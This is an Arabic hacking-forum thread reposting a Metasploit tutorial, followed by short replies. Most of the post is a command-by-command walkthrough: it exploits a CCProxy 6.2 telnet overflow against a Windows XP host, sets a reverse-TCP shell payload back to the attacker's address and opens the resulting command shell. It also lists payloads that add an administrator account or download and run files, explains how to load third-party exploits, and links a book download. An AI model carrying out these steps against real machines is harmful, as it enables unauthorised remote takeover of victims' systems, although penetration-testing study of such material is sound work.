|
![]() |
| LinkBack ![]() | أدوات الموضوع ![]() | انواع عرض الموضوع ![]() |
![]() | رقم المشاركة : 1 (permalink) | ||
![]() بدأ مشروع ثغرات Metasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع Metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا… [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-2.png[/IMG] ما يهمنا حاليا في استغلال الثغرات هي الأوامر المظللة في الصورة msf > show exploits msf > info exploit msf > use exploit نستخدم الأمر الأول لاظهار الثغرات الموجودة في المشروع أما الثاني لاظهار معلومات مفصلة عن الثغرة و مصادر خارجية عنها و الثالث لاستخدام الثغرة و تحديد خياراتها, أول شيء ننفذ الأمر الأول لاستعراض الثغرات الموجودة في المشروع msf > show exploits [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-3.png[/IMG] كما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب و لاظهار معلومات مفصلة عن احدى الثغرات يكفي تنفيذ الأمر info , مثال على ذلك: msf > info windows/proxy/ccproxy_telnet_ping بعد تنفيذ الأمر السابق سيتم اظهار كافة المعلومات المتوفرة عن الثغرة الموجودة في برنامج CCProxy الاصدار 6.2 كما هو واضح في الصورة التالية: [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-4.png[/IMG] قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن استغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح, الأن ننفذ الأمر use لنستخدم الثغرة msf > use windows/proxy/ccproxy_telnet_ping و نستخدم الأمر show لاظهار خيارات الثغرة المتوفرة msf exploit(ccproxy_telnet_ping) > show options نحدد الخيارات التي تناسبنا باستخدام الأمر set كما هو واضح من الصورة التالية: [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-5.png[/IMG] أول شيء أظهرنا خيارات الثغرة باستخدام الأمر السابق ثم حددنا الخيار RHOST وهو IP الجهاز المستهدف و ذلك باستخدام الأمر: msf exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53 بالنسبة لي كان 192.168.0.53 و أبقيت الخيار RPORT نفسه 23 و هو المنفذ الذي يستخدمه برنامج CCProxy بشكل افتراضي و طبعا يمكن تغييره بحسب المنفذ المستخدم مثلا 34 باستخدام الأمر: msf exploit(ccproxy_telnet_ping) > set RPORT 34 بعد ذلك نقوم باظهار الأنظمة المتاحة باستخدام الأمر: msf exploit(ccproxy_telnet_ping) > show targets نحدد الخيار 4 و هو نظام Windows XP SP2 - English بتنفيذ: msf exploit(ccproxy_telnet_ping) > set TARGET 4 [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-6.png[/IMG] أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر: msf exploit(ccproxy_telnet_ping) > show payloads بالنسبة لي سأحدد الاستغلال windows/shell_reverse_tcp و يستخدم هذا الاستغلال لانشاء اتصال عكسي مع الجهاز الذي تم تنفيذ الثغرة عليه و نتحكم بالاتصالات من داخل مشروع ميتاسبلويت msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-7.png[/IMG] مع العلم من امكانية تحديد أي استغلال آخر نريد مثل تنفيذ أمر محدد على النظام, فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator, الأن ننفذ الأمر: msf exploit(ccproxy_telnet_ping) > show options من جديد لمراجعة الخيارات المخصصة للثغرة أو لتعديل أي خيار مثل ما هو واضح بالصورة التالية: [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-8.png[/IMG] يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر: msf exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41 بالنسبة لي سأترك المنفذ 4444 نفسه دون تغيير, الأن لم يبقى علينا الا تطبيق الأمر msf exploit(ccproxy_telnet_ping) > exploit لتنفيذ الثغرة و اذا كانت جميع الخيارات صحيحة سيتم تنفيذ الاستغلال و لنتمكن من مشاهدة الاتصالات العكسية الموجودة ننفذ الأمر: msf > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Command shell 192.168.0.41:23443 -> 192.168.0.53:1032 و من ثم ننفذ الأمر التالي للاتصال باحدى الاتصالات المتاحة و في هذه الحالة هو رقم 1 msf > sessions -i 1 [*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWSsystem32> مع العلم من امكانية تنفيذ أكثر من استغلال على أكثر من جهاز و الحصول على اتصالات أخرى.. أو القيام بهذه العملية بشكل أوتوماتيكي باستخدام احدى أدوات ميتاسبلويت الخطيرة و هي db_autopwn التي سأترك شرحها لموضوع آخر و طبعا يوجد الكثير من الاستغلالت الأخرى أترك تجربتها لكم. كل ما ذكر سابقا مجرد مثال بسيط عن احدى ثغرات الميتاسبلويت لكن المشروع أقوى من ذلك بكثير و يوجد له استخدمات و ثغرات أخرى قوية قد أشرحها قريبا ان شاء الله, كل ماعليك الأن هو التجربة و اعادة المحاولة و لا تتوقع أن تتمكن من استغلال الثغرة من أول مرة أو ثاني مرة و لا حتى بعد 10 مرات كل مرة تجرب بها ثغرة ستكشف شيء جديد و خطأ قمت به و تذكر أن الدقة أهم شيء في استغلال ثغرات مشروع الميتاسبلويت فتحديد البرنامج و الاصدار المصاب أصعب من استغلال الثغرة المكتوبة له. من الجميل أيضا في مشروع ميتاسبلويت هو وجود واجهات رسومية جميلة لتسهيل التعامل مع المشروع و مخصصة للأشخاص الذين لايحبون استخدام سطر الأوامر [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-9.png[/IMG] الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع Metasploit ./msfgui [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-10.png[/IMG] الواجهة التي تعمل من المتصفح لتشغيلها ننفذ الأمر التالي داخل مجلد المشروع ./msfweb بعد ذلك نفتح المتصفح على الرابط http://127.0.0.1:55555 ماذا بعد؟ لنفرض الآن أننا نريد استغلال ثغرة غير موجودة في مشروع الميتاسبلويت أحضرناها من موقع Milw0rm مثلا كيف سنضيفها؟ بصراحة وجدت الكثيرين لا يعرفون الطريقة رغم بساطتها و طبعا الشرح للينوكس و نصيحة للجميع ابتعدوا عن ويندوز في هذه الأمور, كما نعرف في الاصدار 2 السابق من مشروع Metasploit كان المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm أما في الاصدار 3 تم اعادة برمجة المشروع من جديد بلغة Ruby و تأتي الثغرة بالامتداد rb لذلك أول شيء علينا معرفة نوعية الثغرة هل هي للاصدار 3.0 أم لاصدارات سابقة 2.0 ؟ أتوقع أن الاختلاف بين الكود البرمجي بين اللغتين واضح جدا (مثال عن ثغرة للاصدار 2 - مثال عن ثغرة للاصدار 3) طبعا الشرح هنا موجه للاصدار 3.0 فهذا مانتكلم عنه في هذا الموضوع, اذا اطلعنا على كود الثغرة و ركزنا على السطر التالي: class Exploits::Windows:: Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote سنعرف أن الثغرة لنظام Windows مصنفة في Driver اسمها Intel_Centrino_2200BG_driver_probe الأن كل ماعلينا هو التوجه للمجلد الموجود في المسار التالي: /home/USER/.msf3/ طبعا مع استبدال USER باسم المستخدم عندك في نظام لينوكس و اذا لم يكن المجلد موجود يمكننا انشاؤه ببساطة! أما اذا كنت تعمل بالمستخدم root كما في توزيعة BackTrack سيكون مسار المجلد: /root/.msf3 بعد الدخول للمجلد ننشئ مجلد جديد باسم modules بداخله مجلد آخر باسم exploits ليصبح المسار النهائي بهذا الشكل: /home/USER/.msf3/modules/exploits الأن ننشئ بداخل مجلد exploits مجلد باسم windows بداخله مجلد driver بعد ذلك ندخل للمجلد driver و ننشئ ملف الثغرة باسم Intel_Centrino_2200BG_driver_probe متبوعا بالامتداد .rb و بداخله كود الثغرة كامل ليصبح مسار الثغرة النهائي: /home/USER/.msf3/modules/exploits/windows/driver/Intel_Centrino_2200BG_driver_probe.rb جميل جدا الأن كل ماعلينا هو تشغيل سطر أوامر مشروع Metasploit من جديد و ملاحظة عدد الثغرات قبل و بعد تطبيق ما سبق و سنلاحظ وجود الثغرة ضمن قائمة الثغرات الموجودة في المشروع! [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-11.png[/IMG] أما اذا أردنا تحديث المشروع بشكل كامل و اضافة ثغرات و أدوات جديدة.. يكفي الدخول لمجلد المشروع و من ثم تطبيق الأمر التالي: svn update أخيرا يرجى في حال وجود أي خطأ في الشرح تنبيهي له مهما كان بسيط فالشرح طويل نوعا ما و رغم تجريب ماذكر و محاولتي لتجنب الوقع بأي خطأ فقد أسهو أحيانا, أتمنى أن يكون الموضوع قد نال اعجابكم و يرجى عدم نقل الموضوع دون الاشارة برابط للمصدر! تحديث: نظرا لطلب كتاب Metasploit Toolkit for Penetration Testing Exploit Development and Vulnerability Research أكثر من مرة عن طريق التعليقات و الايميل قررت أن أضيف رابط تحميله للموضوع ليستفيد الجميع.. الكتاب يحتوي على شروحات متقدمة لاستخدامات مشروع الميتاسبلويت و برمجة ثغراته, يمكنكم تحميله من http://www.rapidshare.com/files/1453...-h34r7.com.pdf الحقوق للاخ عبد المهيمن br4v3-h34r7 hsjo]hl lav,u Metasploit , avp hsjyghg eyvhji fhgjtwdg
التعديل الأخير تم بواسطة Italiano Algerino Hacker ; 08-20-2009 الساعة 12:43 PM. | |||
| ![]() |
![]() | رقم المشاركة : 10 (permalink) | ||
![]() بالله عليكم تجددو رابط تحميل الكتاب
| |||
| ![]() |
![]() | رقم المشاركة : 12 (permalink) | ||
![]() مشكور أخي الكريم على الشرح
| |||
| ![]() |
![]() |
مواقع النشر (المفضلة) |
|
|
![]() | ||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل | PiNki | قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات | 9 | 10-18-2011 02:00 PM |
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل | Wolf_112 | MetaSploit | 14 | 12-16-2010 04:38 PM |
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل | ViRuS Qalaa | MetaSploit | 1 | 07-03-2010 03:09 AM |
اضافة ثغره على مشروع Metasploit | Wolf_112 | MetaSploit | 12 | 07-16-2009 04:26 PM |